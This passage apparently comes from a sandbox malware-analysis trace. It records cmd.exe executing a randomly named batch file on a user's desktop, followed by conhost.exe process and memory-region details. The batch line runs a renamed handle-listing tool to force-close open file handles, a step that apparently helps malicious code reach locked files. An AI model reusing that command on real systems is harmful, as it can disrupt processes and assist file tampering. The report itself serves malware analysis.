hFindFile=0xde0b68) returned 1 [0296.634] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0296.634] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0296.634] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0296.634] GetEnvironmentStringsW () returned 0xdecd50* [0296.634] FreeEnvironmentStringsA (penv="=") returned 1 [0296.634] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.634] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.634] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0296.775] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.775] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.942] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.942] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0297.009] SetConsoleInputExeNameW () returned 0x1 [0297.009] GetConsoleOutputCP () returned 0x1b5 [0297.184] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0297.184] SetThreadUILanguage (LangId=0x0) returned 0x409 [0297.337] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa0f724, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0297.337] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0297.337] _get_osfhandle (_FileHandle=3) returned 0xb0 [0297.337] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0297.337] _get_osfhandle (_FileHandle=3) returned 0xb0 [0297.337] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0297.337] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa0f6f4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xa0f6f4*=0x94, lpOverlapped=0x0) returned 1 [0297.338] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0297.338] _get_osfhandle (_FileHandle=3) returned 0xb0 [0297.338] GetFileType (hFile=0xb0) returned 0x1 [0297.338] _get_osfhandle (_FileHandle=3) returned 0xb0 [0297.338] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0297.338] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"MSPVWCTL.DLL.mui\"") returned 0x12 [0297.338] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0297.338] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0297.338] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0297.338] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0297.338] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0297.338] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0297.339] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0297.339] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0297.339] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0297.339] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0297.339] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0297.339] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0297.340] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0297.340] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0297.340] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0297.340] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0297.340] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0297.340] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0297.341] _tell (_FileHandle=3) returned 226 [0297.341] _close (_FileHandle=3) returned 0 [0297.341] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa0f4b8 | out: _Buffer="\r\n") returned 2 [0297.341] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.341] GetFileType (hFile=0x3c) returned 0x2 [0297.341] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.341] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f490 | out: lpMode=0xa0f490) returned 1 [0297.369] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.369] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f4a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f4a8*=0x2) returned 1 [0297.559] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0297.559] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.559] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xa0f4b4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0297.559] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xa0f4b4 | out: _Buffer=">") returned 1 [0297.559] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.559] GetFileType (hFile=0x3c) returned 0x2 [0297.559] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.559] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f494 | out: lpMode=0xa0f494) returned 1 [0298.064] _get_osfhandle (_FileHandle=1) returned 0x3c [0298.064] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xa0f4ac, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xa0f4ac*=0x1e) returned 1 [0298.277] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa0f754 | out: _Buffer="FOR") returned 3 [0298.277] _get_osfhandle (_FileHandle=1) returned 0x3c [0298.277] GetFileType (hFile=0x3c) returned 0x2 [0298.278] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0298.278] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f72c | out: lpMode=0xa0f72c) returned 1 [0299.132] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.132] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa0f744, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f744*=0x3) returned 1 [0299.403] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xa0f754 | out: _Buffer=" /F") returned 3 [0299.403] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.403] GetFileType (hFile=0x3c) returned 0x2 [0299.403] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.403] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f72c | out: lpMode=0xa0f72c) returned 1 [0299.592] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.592] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa0f744, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f744*=0x3) returned 1 [0299.889] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xa0f754 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0299.889] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.889] GetFileType (hFile=0x3c) returned 0x2 [0299.889] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.889] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f72c | out: lpMode=0xa0f72c) returned 1 [0300.049] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.049] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa0f744, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f744*=0x20) returned 1 [0300.221] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa0f754 | out: _Buffer=" %I IN ") returned 7 [0300.221] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.221] GetFileType (hFile=0x3c) returned 0x2 [0300.221] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.221] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f72c | out: lpMode=0xa0f72c) returned 1 [0300.520] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.520] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa0f744, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f744*=0x7) returned 1 [0300.666] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa0f750 | out: _Buffer="(`vIDhS3md.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner`) DO ") returned 61 [0300.666] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.666] GetFileType (hFile=0x3c) returned 0x2 [0300.666] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.666] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f728 | out: lpMode=0xa0f728) returned 1 [0300.773] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.773] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0xa0f740, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f740*=0x3d) returned 1 [0300.893] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.893] GetFileType (hFile=0x3c) returned 0x2 [0300.893] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.894] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f734 | out: lpMode=0xa0f734) returned 1 [0300.984] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.984] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa0f74c, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xa0f74c*=0x1) returned 1 [0301.071] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.071] GetFileType (hFile=0x3c) returned 0x2 [0301.071] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.071] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f724 | out: lpMode=0xa0f724) returned 1 [0301.104] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.104] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xde0b70*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xa0f73c, lpReserved=0x0 | out: lpBuffer=0xde0b70*, lpNumberOfCharsWritten=0xa0f73c*=0xc) returned 1 [0301.241] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa0f744 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0301.241] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.241] GetFileType (hFile=0x3c) returned 0x2 [0301.241] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.241] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f71c | out: lpMode=0xa0f71c) returned 1 [0301.311] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.311] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0xa0f734, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f734*=0x26) returned 1 [0301.374] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa0f754 | out: _Buffer=") ") returned 2 [0301.374] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.374] GetFileType (hFile=0x3c) returned 0x2 [0301.374] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.374] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f72c | out: lpMode=0xa0f72c) returned 1 [0301.407] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.407] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f744, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f744*=0x2) returned 1 [0301.435] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa0f768 | out: _Buffer="\r\n") returned 2 [0301.435] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.435] GetFileType (hFile=0x3c) returned 0x2 [0301.435] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.436] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f740 | out: lpMode=0xa0f740) returned 1 [0301.439] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.439] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f758, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f758*=0x2) returned 1 [0301.444] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0301.444] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0301.444] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0301.444] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0301.444] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0301.445] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0301.445] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0301.445] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0xa0f690, _Radix=0 | out: _EndPtr=0xa0f690*=",6 delims=: \"") returned 3 [0301.445] wcstol (in: _String="6 delims=: \"", _EndPtr=0xa0f690, _Radix=0 | out: _EndPtr=0xa0f690*=" delims=: \"") returned 6 [0301.445] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0301.445] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0301.445] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0301.445] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0301.445] _wpopen (_Command="vIDhS3md.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner", _Mode="rb") returned 0x77981268 [0301.463] feof (_File=0x77981268) returned 0 [0301.464] ferror (_File=0x77981268) returned 0 [0301.464] fgets (_Buf=0xdeeba0, _MaxCount=256, _File=0x77981268) Thread: id = 914 os_tid = 0xfa0 Process: id = "110" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x711c6000" os_pid = "0x364" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "109" os_parent_pid = "0xdfc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7963 start_va = 0x7f7b8000 end_va = 0x7f7b8fff entry_point = 0x0 region_type = private name = "private_0x000000007f7b8000" filename = "" Region: id = 7964 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7965 start_va = 0xb0d98c0000 end_va = 0xb0d98dffff entry_point = 0x0 region_type = private name = "private_0x000000b0d98c0000" filename = "" Region: id = 7966 start_va = 0xb0d98e0000 end_va = 0xb0d98f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d98e0000" filename = "" Region: id = 7967 start_va = 0xb0d9900000 end_va = 0xb0d993ffff entry_point = 0x0 region_type = private name = "private_0x000000b0d9900000" filename = "" Region: id = 7968 start_va = 0x7df5ff440000 end_va = 0x7ff5ff43ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff440000" filename = "" Region: id = 7969 start_va = 0x7ff7fd060000 end_va = 0x7ff7fd082fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd060000" filename = "" Region: id = 7970 start_va = 0x7ff7fd087000 end_va = 0x7ff7fd087fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd087000" filename = "" Region: id = 7971 start_va = 0x7ff7fd08e000 end_va = 0x7ff7fd08ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd08e000" filename = "" Region: id = 7972 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7973 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7974 start_va = 0xb0d98c0000 end_va = 0xb0d98cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d98c0000" filename = "" Region: id = 7975 start_va = 0xb0d9990000 end_va = 0xb0d9a8ffff entry_point = 0x0 region_type = private name = "private_0x000000b0d9990000" filename = "" Region: id = 7976 start_va = 0xb0d9a90000 end_va = 0xb0d9b4dfff entry_point = 0xb0d9a90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7977 start_va = 0x7ff7fcf60000 end_va = 0x7ff7fd05ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fcf60000" filename = "" Region: id = 7978 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7979 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7980 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7981 start_va = 0xb0d9940000 end_va = 0xb0d997ffff entry_point = 0x0 region_type = private name = "private_0x000000b0d9940000" filename = "" Region: id = 7982 start_va = 0xb0d9b50000 end_va = 0xb0d9c4ffff entry_point = 0x0 region_type = private name = "private_0x000000b0d9b50000" filename = "" Region: id = 7983 start_va = 0x7ff7fd08c000 end_va = 0x7ff7fd08dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd08c000" filename = "" Region: id = 7984 start_va = 0xb0d98d0000 end_va = 0xb0d98d6fff entry_point = 0x0 region_type = private name = "private_0x000000b0d98d0000" filename = "" Region: id = 7985 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7986 start_va = 0xb0d9980000 end_va = 0xb0d9980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d9980000" filename = "" Region: id = 7987 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7988 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7989 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7990 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7991 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7992 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7993 start_va = 0xb0d9b50000 end_va = 0xb0d9b56fff entry_point = 0x0 region_type = private name = "private_0x000000b0d9b50000" filename = "" Region: id = 7994 start_va = 0xb0d9c40000 end_va = 0xb0d9c4ffff entry_point = 0x0 region_type = private name = "private_0x000000b0d9c40000" filename = "" Region: id = 7995 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7996 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7997 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7998 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7999 start_va = 0xb0d9c50000 end_va = 0xb0d9dd7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d9c50000" filename = "" Region: id = 8000 start_va = 0xb0d9de0000 end_va = 0xb0d9f60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d9de0000" filename = "" Region: id = 8001 start_va = 0xb0d9f70000 end_va = 0xb0db36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b0d9f70000" filename = "" Region: id = 8002 start_va = 0xb0d9b60000 end_va = 0xb0d9b60fff entry_point = 0x0 region_type = private name = "private_0x000000b0d9b60000" filename = "" Region: id = 8003 start_va = 0xb0d9b70000 end_va = 0xb0d9b70fff entry_point = 0x0 region_type = private name = "private_0x000000b0d9b70000" filename = "" Region: id = 8004 start_va = 0xb0db370000 end_va = 0xb0db4dffff entry_point = 0x0 region_type = private name = "private_0x000000b0db370000" filename = "" Region: id = 8012 start_va = 0xb0d9b80000 end_va = 0xb0d9bbffff entry_point = 0x0 region_type = private name = "private_0x000000b0d9b80000" filename = "" Region: id = 8013 start_va = 0x7ff7fd08a000 end_va = 0x7ff7fd08bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd08a000" filename = "" Region: id = 8014 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 8015 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 8016 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8017 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8018 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 8019 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 8020 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 8021 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 8022 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 8023 start_va = 0xb0db370000 end_va = 0xb0db4cffff entry_point = 0x0 region_type = private name = "private_0x000000b0db370000" filename = "" Region: id = 8024 start_va = 0xb0db4d0000 end_va = 0xb0db4dffff entry_point = 0x0 region_type = private name = "private_0x000000b0db4d0000" filename = "" Region: id = 8026 start_va = 0xb0db4e0000 end_va = 0xb0db816fff entry_point = 0xb0db4e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8027 start_va = 0xb0d9900000 